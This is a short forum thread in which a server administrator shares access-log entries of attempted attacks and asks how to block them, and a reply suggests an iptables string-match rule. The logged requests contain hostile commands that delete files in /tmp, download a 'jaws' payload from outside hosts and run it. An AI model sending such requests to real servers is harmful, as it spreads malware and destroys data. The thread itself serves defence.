Someone is trying to hack me with Jaws

[Dettol]

84.247.48.5 - - [26/Sep/2022:06:15:30 +0900] "GET /shell?cd+/tmp;rm+-rf+*;wget+185.216.71.192/jaws;sh+/tmp/jaws HTTP/1.1" 403 466 "-" "Hello, world"
120.48.54.32 - - [26/Sep/2022:08:30:17 +0900] "GET /shell?cd+/tmp;rm+-rf+*;wget+ rischyo.cf/jaws;sh+/tmp/jaws" 400 458 "-" "-"

I see a lot of this kind of log in my directadmin access_log , how can I block them to trying get shell for work? (ModSecurity rule?)

Thank you

 

[abasidi]

Hi,
you can use iptables to block all URL contains this string "shell" , just by sure that you don't use this string in yours url :

-A INPUT -p tcp --destination-port 80 -m string --string "shell" --algo kmp -j DROP